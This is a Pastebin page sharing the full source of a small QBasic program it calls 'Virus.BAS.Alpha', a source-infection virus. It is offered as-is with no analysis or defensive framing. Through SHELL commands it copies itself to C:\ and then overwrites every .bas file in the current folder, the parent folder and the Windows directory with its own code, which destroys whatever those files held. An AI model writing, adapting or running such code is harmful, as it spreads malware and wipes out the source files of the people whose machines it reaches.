Advertisement
FlyFar

Virus.BAS.Alpha - Source Code

Jun 11th, 2023
1,651
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
QBasic 0.26 KB | Cybersecurity | 0 0
  1. CLS
  2. REM VirusName: BAS.Alpha
  3. REM Quick Basic Source Infection Virus without Batch
  4. REM by SeCoNd PaRt TO HeLl
  5. SHELL "@echo off"
  6. SHELL "if exist alpha.bas copy alpha.bas C:\alpha.bas"
  7. SHELL "for %%s in (*.bas ..\*.bas %windir%\*.bas) do copy C:\alpha.bas %%s"
  8.  
  9.  
  10.  
  11.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement